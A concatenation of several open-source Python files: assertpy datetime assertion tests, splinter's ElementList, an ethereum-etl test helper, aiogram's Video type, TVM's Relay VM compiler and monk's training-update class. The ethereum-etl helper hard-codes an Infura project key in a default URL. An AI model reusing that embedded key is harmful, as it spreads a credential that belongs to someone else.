def test_is_not_between_bad_arg1_type_failure():
try:
assert_that(d1).is_not_between(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given low arg must be <datetime>, but was <int>')
def test_is_not_between_bad_arg2_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_between(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given high arg must be <datetime>, but was <datetime>')
def test_is_close_to():
d2 = datetime.datetime.today()
assert_that(d1).is_close_to(d2, datetime.timedelta(minutes=5))
def test_is_close_to_failure():
try:
d2 = d1 + datetime.timedelta(minutes=5)
assert_that(d1).is_close_to(d2, datetime.timedelta(minutes=1))
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be close to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> within tolerance <\d+:\d{2}:\d{2}>, but was not.')
def test_is_close_to_bad_arg_type_failure():
try:
assert_that(d1).is_close_to(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was <int>')
def test_is_close_to_bad_tolerance_arg_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_close_to(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given tolerance arg must be timedelta, but was <int>')
def test_is_not_close_to():
d2 = d1 + datetime.timedelta(minutes=5)
assert_that(d1).is_not_close_to(d2, datetime.timedelta(minutes=4))
def test_is_not_close_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_close_to(d2, datetime.timedelta(minutes=5))
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to not be close to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> within tolerance <\d+:\d{2}:\d{2}>, but was.')
def test_is_not_close_to_bad_arg_type_failure():
try:
assert_that(d1).is_not_close_to(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was <int>')
def test_is_not_close_to_bad_tolerance_arg_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_close_to(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given tolerance arg must be timedelta, but was <int>')
t1 = datetime.timedelta(seconds=60)
def test_is_greater_than_timedelta():
d2 = datetime.timedelta(seconds=120)
assert_that(d2).is_greater_than(t1)
def test_is_greater_than_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_greater_than(t2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be greater than <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_greater_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_greater_than_or_equal_to_timedelta():
assert_that(t1).is_greater_than_or_equal_to(t1)
def test_is_greater_than_or_equal_to_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_greater_than_or_equal_to(t2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be greater than or equal to <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_or_equal_to_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_greater_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_less_than_timedelta():
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_less_than(t2)
def test_is_less_than_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t2).is_less_than(t1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be less than <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_less_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_less_than_or_equal_to_timedelta():
assert_that(t1).is_less_than_or_equal_to(t1)
def test_is_less_than_or_equal_to_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t2).is_less_than_or_equal_to(t1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be less than or equal to <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_or_equal_to_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_less_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_between_timedelta():
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(d2).is_between(t1, d3)
def test_is_between_timedelta_failure():
try:
d2 = datetime.timedelta(seconds=30)
d3 = datetime.timedelta(seconds=40)
assert_that(t1).is_between(d2, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be between <\d{1,2}:\d{2}:\d{2}> and <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_not_between_timedelta():
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(t1).is_not_between(d2, d3)
def test_is_not_between_timedelta_failure():
try:
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(d2).is_not_between(t1, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to not be between <\d{1,2}:\d{2}:\d{2}> and <\d{1,2}:\d{2}:\d{2}>, but was.')
|
splinter/element_list.py | schurma/splinter | 2,049 | 12739783 | <filename>splinter/element_list.py
# -*- coding: utf-8 -*-
# Copyright 2012 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from splinter.exceptions import ElementDoesNotExist
class ElementList(object):
"""
List of elements. Each member of the list is (usually) an instance
of :class:`ElementAPI <splinter.driver.ElementAPI>`.
Beyond the traditional list methods, the ``ElementList`` provides some
other methods, listed below.
There is a peculiar behavior on ElementList: you never get an
    ``IndexError``. Instead, you get an :class:`ElementDoesNotExist
    <splinter.exceptions.ElementDoesNotExist>` exception when trying to
    access a nonexistent item in the list:
>>> element_list = ElementList([])
>>> element_list[0] # raises ElementDoesNotExist
"""
def __init__(self, list, driver=None, find_by=None, query=None):
self._container = []
self._container.extend(list)
self.driver = driver
self.find_by = find_by
self.query = query
def __getitem__(self, index):
if not isinstance(index, int) and not isinstance(index, slice):
return self.first[index]
try:
return self._container[index]
except IndexError:
raise ElementDoesNotExist(
u'no elements could be found with {0} "{1}"'.format(
self.find_by, self.query
)
)
@property
def first(self):
"""An alias to the first element of the list.
Example:
>>> assert element_list[0] == element_list.first
"""
return self[0]
@property
def last(self):
"""An alias to the last element of the list.
Example:
>>> assert element_list[-1] == element_list.last
"""
return self[-1]
def is_empty(self):
"""Check if the ElementList is empty.
Returns:
bool: True if the list is empty, else False
"""
return len(self) == 0
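    # Unknown attribute lookups are proxied to the first element and, failing
    # that, to the underlying list -- e.g. ``element_list.text`` behaves like
    # ``element_list.first.text``.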
def __getattr__(self, name):
try:
return getattr(self.first, name)
except AttributeError:
try:
return getattr(self._container, name)
except AttributeError:
raise AttributeError(
u"'{0}' object has no attribute '{1}'".format(
self.__class__.__name__, name
)
)
def __iter__(self):
for item in self._container:
yield item
def __len__(self):
"""__len__ checks the internal container."""
return len(self._container)
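# ---------------------------------------------------------------------------
# Illustrative usage sketch added for clarity (not part of the original
# module). It only needs plain Python values, so it stays self-contained;
# real ElementList instances hold driver elements rather than strings.
if __name__ == "__main__":
    elements = ElementList(["a", "b", "c"], find_by="css", query=".item")
    assert elements.first == "a" and elements.last == "c"
    assert not elements.is_empty()
    try:
        ElementList([], find_by="css", query=".missing")[0]
    except ElementDoesNotExist as error:
        # e.g. 'no elements could be found with css ".missing"'
        print(error)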
|
tests/ethereumetl/job/helpers.py | zalam003/ethereum-etl | 1,482 | 12739800 | import os
from web3 import HTTPProvider
from ethereumetl.providers.rpc import BatchHTTPProvider
from tests.ethereumetl.job.mock_batch_web3_provider import MockBatchWeb3Provider
from tests.ethereumetl.job.mock_web3_provider import MockWeb3Provider
def get_web3_provider(provider_type, read_resource_lambda=None, batch=False):
if provider_type == 'mock':
if read_resource_lambda is None:
            raise ValueError('read_resource_lambda must not be None for provider type {}'.format(provider_type))
if batch:
provider = MockBatchWeb3Provider(read_resource_lambda)
else:
provider = MockWeb3Provider(read_resource_lambda)
elif provider_type == 'infura':
provider_url = os.environ.get('PROVIDER_URL', 'https://mainnet.infura.io/v3/7aef3f0cd1f64408b163814b22cc643c')
if batch:
provider = BatchHTTPProvider(provider_url)
else:
provider = HTTPProvider(provider_url)
else:
raise ValueError('Provider type {} is unexpected'.format(provider_type))
return provider
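# ---------------------------------------------------------------------------
# Illustrative usage sketch added for clarity (not part of the original
# helper). The fixture lambda below is a made-up stand-in for the resource
# readers used by the test jobs, and the 'infura' provider needs network
# access (or a PROVIDER_URL environment variable pointing at another node)
# before any requests are actually issued.
if __name__ == "__main__":
    # Mock provider backed by a caller-supplied resource reader.
    mock_provider = get_web3_provider(
        'mock',
        read_resource_lambda=lambda name: '{}',  # hypothetical fixture reader
        batch=True,
    )
    # Batch JSON-RPC provider against a real endpoint.
    rpc_provider = get_web3_provider('infura', batch=True)
    print(type(mock_provider).__name__, type(rpc_provider).__name__)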
|
aiogram/types/video.py | SvineruS/aiogram | 2,744 | 12739810 | <filename>aiogram/types/video.py
from . import base
from . import fields
from . import mixins
from .photo_size import PhotoSize
class Video(base.TelegramObject, mixins.Downloadable):
"""
This object represents a video file.
https://core.telegram.org/bots/api#video
"""
file_id: base.String = fields.Field()
file_unique_id: base.String = fields.Field()
width: base.Integer = fields.Field()
height: base.Integer = fields.Field()
duration: base.Integer = fields.Field()
thumb: PhotoSize = fields.Field(base=PhotoSize)
file_name: base.String = fields.Field()
mime_type: base.String = fields.Field()
file_size: base.Integer = fields.Field()
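# ---------------------------------------------------------------------------
# Illustrative handler sketch added for clarity (not part of the original type
# definition). The bot token is a placeholder, and the download() keyword
# arguments have changed between aiogram 2.x releases, so treat the call as an
# assumption about the Downloadable mixin rather than a pinned API.
if __name__ == "__main__":
    from aiogram import Bot, Dispatcher, types

    bot = Bot(token="123456:PLACEHOLDER")  # placeholder token, never valid
    dp = Dispatcher(bot)

    @dp.message_handler(content_types=types.ContentType.VIDEO)
    async def handle_video(message: types.Message):
        video = message.video  # instance of the Video type above
        print(video.file_id, video.width, video.height, video.duration)
        # Provided by mixins.Downloadable; keyword name varies across 2.x.
        await video.download(destination_file="incoming.mp4")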
|
python/tvm/relay/backend/vm.py | shengxinhu/tvm | 4,640 | 12739836 | <filename>python/tvm/relay/backend/vm.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=no-else-return, unidiomatic-typecheck, undefined-variable, invalid-name, redefined-builtin
"""
The Relay Virtual Machine.
Implements a Python interface to compiling and executing on the Relay VM.
"""
import numpy as np
import tvm.runtime.ndarray as _nd
import tvm.runtime.vm as vm_rt
from tvm import autotvm
from tvm.relay import expr as _expr
from tvm.relay.backend.interpreter import Executor
from tvm.target import Target
from . import _vm
def compile(mod, target=None, target_host=None, params=None):
"""Compile the module to VM executable. A helper function for VMCompiler.
Parameters
----------
mod : tvm.IRModule
The Relay module to build.
target : any multi-target like object, see Target.canon_multi_target
For homogeneous compilation, the unique build target.
For heterogeneous compilation, a dictionary or list of possible build targets.
target_host : None, or any target-like object, see Target.canon_target
Host compilation target, if target is device.
When TVM compiles device specific program such as CUDA,
we also need host(CPU) side code to interact with the driver
to setup the dimensions and parameters correctly.
target_host is used to specify the host side codegen target.
By default, llvm is used if it is enabled,
otherwise a stackvm intepreter is used.
params : dict of str to NDArray
Input parameters to the graph that do not change
during inference time. Used for constant folding.
Returns
-------
exec : tvm.runtime.vm.Executable
The VM executable that contains both library code and bytecode.
"""
compiler = VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod, target, target_host)
compiler.codegen()
return compiler.get_exec()
class VMCompiler(object):
"""Compiler that compiles Relay module to VM executable."""
def __init__(self):
self.mod = _vm._VMCompiler()
self._lower = self.mod["lower"]
self._codegen = self.mod["codegen"]
self._get_exec = self.mod["get_executable"]
self._set_params_func = self.mod["set_params"]
self._get_params_func = self.mod["get_params"]
self._optimize = self.mod["optimize"]
def set_params(self, params):
"""Set constant parameters for the model.
Parameters
----------
params : dict of str to NDArray
Input parameters to the graph that do not change
during inference time. Used for constant folding.
"""
inputs = {}
for name, param in params.items():
if isinstance(param, np.ndarray):
param = _nd.array(param)
inputs[name] = _expr.const(param)
self._set_params_func(inputs)
def get_params(self):
"""Return the updated weights."""
params = self._get_params_func()
ret = {}
for key, value in params.items():
ret[key] = value.data
return ret
def lower(self, mod, target=None, target_host=None):
"""Lower the module to VM bytecode.
Parameters
----------
mod : tvm.IRModule
The Relay module to build.
target : any multi-target like object, see Target.canon_multi_target
For homogeneous compilation, the unique build target.
For heterogeneous compilation, a dictionary or list of possible build targets.
target_host : any target-like object, see Target.canon_target
Host compilation target, if target is device.
"""
raw_targets = Target.canon_multi_target_and_host(target, target_host)
tophub_context = self._tophub_context(raw_targets)
with tophub_context:
self._lower(mod, raw_targets)
def codegen(self):
"""Generate the kernel library."""
self._codegen()
def optimize(self, mod, target=None, target_host=None, params=None):
"""Helper method that optimizes a Relay module via VM.
Parameters
----------
mod : tvm.IRModule
target : any multi-target like object, see Target.canon_multi_target
For homogeneous compilation, the unique build target.
For heterogeneous compilation, a dictionary or list of possible build targets.
target_host : any target-like object, see Target.canon_target
Host compilation target, if target is device.
params : dict of str to NDArray
Input parameters to the graph that do not change
during inference time. Used for constant folding.
Returns
-------
mod : tvm.IRModule
The optimized relay module.
params : dict
The parameters of the final module.
"""
raw_targets = Target.canon_multi_target_and_host(target, target_host)
if params:
self.set_params(params)
return self._optimize(mod, raw_targets), self.get_params()
def get_exec(self):
"""Get the VM executable.
Returns
-------
exec : tvm.runtime.vm.Executable
The VM executable that contains both library code and bytecode.
"""
return vm_rt.Executable(self._get_exec())
def _tophub_context(self, raw_targets):
"""Get the autotvm context."""
# If current dispatch context is fallback context (the default root context),
# then load pre-tuned parameters from TopHub
if isinstance(autotvm.DispatchContext.current, autotvm.FallbackContext):
tophub_context = autotvm.tophub.context(raw_targets)
else:
tophub_context = autotvm.utils.EmptyContext()
return tophub_context
class VMExecutor(Executor):
"""
An implementation of the executor interface for
the Relay VM.
    Useful interface for experimentation and debugging;
    the VM can also be used directly through the runtime API
    provided by `tvm.runtime.vm`.
Parameters
----------
mod : :py:class:`~tvm.IRModule`
The module to support the execution.
device : :py:class:`~tvm.runtime.Device`
The runtime device to run the code on.
target : :py:class:`Target`
The target option to build the function.
"""
def __init__(self, mod, device, target):
if mod is None:
raise RuntimeError("Must provide module to get VM executor.")
self.mod = mod
self.device = device
self.target = target
self.executable = None
self.vm = None
def _make_executor(self, expr=None):
if expr:
self.mod["main"] = expr
self.executable = compile(self.mod, self.target)
self.vm = vm_rt.VirtualMachine(self.executable, self.device)
def _vm_wrapper(*args, **kwargs):
args = self._convert_args(self.mod["main"], args, kwargs)
return self.vm.run(*args)
return _vm_wrapper
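# ---------------------------------------------------------------------------
# Illustrative end-to-end sketch added for clarity (not part of the original
# module): build a tiny Relay function, compile it with the helper above and
# run it on the VM. Assumes a CPU build of TVM with the llvm target enabled.
if __name__ == "__main__":
    import tvm
    from tvm import relay

    x = relay.var("x", shape=(3,), dtype="float32")
    func = relay.Function([x], x + relay.const(1.0, "float32"))
    mod = tvm.IRModule.from_expr(func)

    exe = compile(mod, target="llvm")  # module-level helper defined above
    vm = vm_rt.VirtualMachine(exe, tvm.cpu())
    result = vm.run(np.ones((3,), dtype="float32"))
    print(result.numpy())  # -> [2. 2. 2.]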
|
tests/r/test_snow_dates.py | hajime9652/observations | 199 | 12739841 | <reponame>hajime9652/observations
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.snow_dates import snow_dates
def test_snow_dates():
"""Test module snow_dates.py by downloading
snow_dates.csv and testing shape of
extracted data has 44 rows and 3 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = snow_dates(test_path)
try:
assert x_train.shape == (44, 3)
except:
shutil.rmtree(test_path)
    raise
|
monk/tf_keras_1/finetune/level_13_updates_main.py | take2rohit/monk_v1 | 542 | 12739844 | from monk.tf_keras_1.finetune.imports import *
from monk.system.imports import *
from monk.tf_keras_1.finetune.level_12_losses_main import prototype_losses
class prototype_updates(prototype_losses):
'''
Main class for all parametric update functions
Args:
verbose (int): Set verbosity levels
0 - Print Nothing
1 - Print desired details
'''
@accepts("self", verbose=int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def __init__(self, verbose=1):
super().__init__(verbose=verbose);
##########################################################################################################################################################
@warning_checks(None, ["gte", 32, "lte", 1024], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_input_size(self, input_size):
'''
Update input size.
Args:
input_size (int): New input size
Returns:
None
'''
self.system_dict = set_input_size(input_size, self.system_dict);
self.custom_print("Update: Input size - {}".format(self.system_dict["dataset"]["params"]["input_size"]));
self.custom_print("");
@warning_checks(None, ["lte", 128], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_batch_size(self, batch_size):
'''
Update batch size.
Args:
batch_size (int): New batch size
Returns:
None
'''
self.system_dict = set_batch_size(batch_size, self.system_dict);
self.custom_print("Update: Batch size - {}".format(self.system_dict["dataset"]["params"]["batch_size"]));
self.custom_print("");
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_shuffle_data(self, shuffle):
'''
Update to shuffle data or not.
Args:
shuffle (bool): If True, will shuffle data
Returns:
None
'''
self.system_dict = set_data_shuffle(shuffle, self.system_dict);
self.custom_print("Update: Data shuffle - {}".format(self.system_dict["dataset"]["params"]["train_shuffle"]));
self.custom_print("");
@warning_checks(None, ["lte", psutil.cpu_count()], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_num_processors(self, num_processors):
'''
Update num processors for data loader.
Args:
num_processors (int): Max CPUs for data sampling
Returns:
None
'''
self.system_dict = set_num_processors(num_processors, self.system_dict);
self.custom_print("Update: Num processors - {}".format(self.system_dict["dataset"]["params"]["num_workers"]));
self.custom_print("");
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_weighted_sampling(self, sample):
'''
Function inactive
'''
self.system_dict = set_weighted_sampling(sample, self.system_dict);
self.custom_print("Update: Weighted Sampling - {}".format(self.system_dict["dataset"]["params"]["weighted_sample"]));
self.custom_print("");
@warning_checks(None, ["gt", 0.5, "lt", 1], post_trace=False)
@error_checks(None, ["gt", 0, "lt", 1], post_trace=False)
@accepts("self", float, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_trainval_split(self, value):
'''
Update training-validation split
Args:
split (float): Indicating train validation split
Division happens as follows:
train - total dataset * split * 100
val - total dataset * (1-split) * 100
Returns:
None
'''
if(self.system_dict["dataset"]["dataset_type"] == "train"):
dataset_path = self.system_dict["dataset"]["train_path"];
path_to_csv=False;
elif(self.system_dict["dataset"]["dataset_type"] == "train-val"):
dataset_path = [self.system_dict["dataset"]["train_path"], self.system_dict["dataset"]["val_path"]];
path_to_csv=False;
elif(self.system_dict["dataset"]["dataset_type"] == "csv_train"):
dataset_path = self.system_dict["dataset"]["train_path"];
path_to_csv = self.system_dict["dataset"]["csv_train"];
elif(self.system_dict["dataset"]["dataset_type"] == "csv_train-val"):
dataset_path = [self.system_dict["dataset"]["train_path"], self.system_dict["dataset"]["val_path"]];
path_to_csv = [self.system_dict["dataset"]["csv_train"], self.system_dict["dataset"]["csv_val"]];
else:
msg = "Dataset Type invalid.\n";
msg += "Cannot update split"
            ConstraintWarning(msg)
self.system_dict = set_dataset_train_path(self.system_dict, dataset_path, value, path_to_csv, self.system_dict["dataset"]["params"]["delimiter"]);
@warning_checks(None, dataset_path=None, split=["gt", 0.5, "lt", 1], path_to_csv=None, delimiter=None, post_trace=False)
@error_checks(None, dataset_path=["folder", 'r'], split=["gt", 0, "lt", 1], path_to_csv=["file", 'r'], delimiter=["in", [",", ";", "-", " "]], post_trace=False)
@accepts("self", dataset_path=[str, list], split=float, path_to_csv=[str, list, bool], delimiter=str, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_dataset(self, dataset_path=False, split=0.9, path_to_csv=False, delimiter=","):
'''
Update dataset path
Args:
dataset_path (str, list): Path to Dataset folder
1) Single string if validation data does not exist
2) List [train_path, val_path] in case of separate train and val data
path_to_csv (str, list): Path to csv file pointing towards images
1) Single string if validation data does not exist
2) List [train_path, val_path] in case of separate train and val data
value (float): Indicating train validation split
Division happens as follows:
train - total dataset * split * 100
val - total dataset * (1-split) * 100
delimiter (str): Delimiter for csv file
Returns:
None
'''
self.system_dict = set_dataset_train_path(self.system_dict, dataset_path, split, path_to_csv, delimiter);
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", str, force=bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_model_name(self, model_name, force=False):
'''
Update model name
Args:
model_name (str): Select from available models. Check via List_Models() function
force (bool): Dummy function
Returns:
None
'''
if(not force):
if(self.system_dict["training"]["status"]):
ConstraintWarning("Model trained using {}\n".format(self.system_dict["model"]["params"]["model_name"]));
ConstraintWarning("Changing the model will overwrite previously trained models if training is executed.\n");
inp = input("Do you wish to continue further (y/n):");
if(inp == "y"):
self.system_dict = set_model_name(model_name, self.system_dict);
self.custom_print("Update: Model name - {}".format(self.system_dict["model"]["params"]["model_name"]));
self.custom_print("");
else:
self.custom_print("Model not updated.");
self.custom_print("");
else:
self.system_dict = set_model_name(model_name, self.system_dict);
self.custom_print("Update: Model name - {}".format(self.system_dict["model"]["params"]["model_name"]));
self.custom_print("");
else:
self.system_dict = set_model_name(model_name, self.system_dict);
self.custom_print("Update: Model name - {}".format(self.system_dict["model"]["params"]["model_name"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", [str, list], force=bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_model_path(self, model_path, force=False):
'''
Update to use gpu or cpu
Args:
gpu (bool): If True, then use GPU
Returns:
None
'''
if(not force):
if(self.system_dict["training"]["status"]):
ConstraintWarning("Model trained using {}\n".format(self.system_dict["model"]["params"]["model_name"]));
ConstraintWarning("Changing the model will overwrite previously trained models if training is executed.\n");
inp = input("Do you wish to continue further (y/n):");
if(inp == "y"):
self.system_dict = set_model_path(model_path, self.system_dict);
self.custom_print("Update: Model path - {}".format(self.system_dict["model"]["params"]["model_path"]));
self.custom_print("");
else:
self.custom_print("Model not updated.");
self.custom_print("");
else:
self.system_dict = set_model_path(model_path, self.system_dict);
self.custom_print("Update: Model path - {}".format(self.system_dict["model"]["params"]["model_path"]));
self.custom_print("");
else:
self.system_dict = set_model_path(model_path, self.system_dict);
self.custom_print("Update: Model path - {}".format(self.system_dict["model"]["params"]["model_path"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_use_gpu(self, gpu):
'''
Update to use gpu or cpu
Args:
gpu (bool): If True, then use GPU
Returns:
None
'''
self.system_dict = set_device(gpu, self.system_dict);
self.custom_print("Update: Use Gpu - {}".format(self.system_dict["model"]["params"]["use_gpu"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_use_pretrained(self, pretrained):
'''
Update to use pretrained wights or randomly initialized weights
Args:
pretrained (bool): If True, use pretrained weights
else, use randomly initialized weights
Returns:
None
'''
self.system_dict = set_pretrained(pretrained, self.system_dict);
self.custom_print("Update: Use pretrained - {}".format(self.system_dict["model"]["params"]["use_pretrained"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_freeze_base_network(self, freeze):
'''
Update whether freeze base network or not
Args:
freeze (bool): If True, then base network is non-trainable, works as a feature extractor
Returns:
None
'''
self.system_dict = set_freeze_base_network(freeze, self.system_dict);
self.custom_print("Update: Freeze Base Network - {}".format(self.system_dict["model"]["params"]["freeze_base_network"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@error_checks(None, ["gte", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_freeze_layers(self, num_freeze):
'''
Update to freeze certain layers in the network
Args:
num_freeze (int): Number of layers to freeze in network starting from top
Returns:
None
'''
self.system_dict["model"]["params"]["num_freeze"] = num_freeze;
self.custom_print("Update: Freeze layers - {}".format(self.system_dict["model"]["params"]["num_freeze"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@warning_checks(None, ["lt", 100], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_num_epochs(self, num_epochs):
'''
Update number of epochs to train the network
Args:
num_epochs (int): New number of epochs
Returns:
None
'''
self.system_dict = set_num_epochs(num_epochs, self.system_dict);
self.custom_print("Update: Num Epochs - {}".format(self.system_dict["hyper-parameters"]["num_epochs"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@warning_checks(None, ["lt", 1], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", [int, float], post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_learning_rate(self, learning_rate):
'''
Update base learning rate for training
Args:
learning_rate (float): New base learning rate
Returns:
None
'''
self.system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
self.system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
self.custom_print("Update: Learning Rate - {}".format(self.system_dict["hyper-parameters"]["learning_rate"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_display_progress_realtime(self, value):
'''
Update display progress param
Args:
value (bool): If True, then real time progress is displayed
Returns:
None
'''
self.system_dict = set_display_progress_realtime(value, self.system_dict);
self.custom_print("Update: Display progress realtime - {}".format(self.system_dict["training"]["settings"]["display_progress_realtime"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_display_progress(self, value):
'''
Update display progress param
Args:
value (bool): If True, then per epoch progress is displayed
Returns:
None
'''
self.system_dict = set_display_progress(value, self.system_dict);
self.custom_print("Update: Display progress - {}".format(self.system_dict["training"]["settings"]["display_progress"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@error_checks(None, None, prefix=["name", ["A-Z", "a-z", "0-9", "-", "_"]], post_trace=False)
@accepts("self", bool, prefix=str, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_save_intermediate_models(self, value, prefix="intermediate_model_"):
'''
Update whether to save intermediate models or not
Args:
value (bool): If True, saves model weight post every epoch
prefix (str): Appends a prefix to intermediate weights
Returns:
None
'''
if(value):
if(not os.access(self.system_dict["model_dir"], os.W_OK)):
msg = "Folder \"{}\" has no read access".format(self.system_dict["model_dir"])
msg += "Cannot save Intermediate models";
raise ConstraintError(msg);
self.system_dict = set_save_intermediate_models(value, self.system_dict);
self.system_dict = set_intermediate_model_prefix(prefix, self.system_dict);
self.custom_print("Update: Save Intermediate models - {}".format(self.system_dict["training"]["settings"]["save_intermediate_models"]));
if(self.system_dict["training"]["settings"]["save_intermediate_models"]):
self.custom_print("Update: Intermediate model prefix - {}".format(self.system_dict["training"]["settings"]["intermediate_model_prefix"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_save_training_logs(self, value):
'''
Update whether to save training logs or not
Args:
value (bool): If True, saves all training and validation metrics. Required for comparison.
Returns:
None
'''
self.system_dict = set_save_training_logs(value, self.system_dict);
self.custom_print("Update: Save Training logs - {}".format(self.system_dict["training"]["settings"]["save_training_logs"]));
self.custom_print("");
##########################################################################################################################################################
|
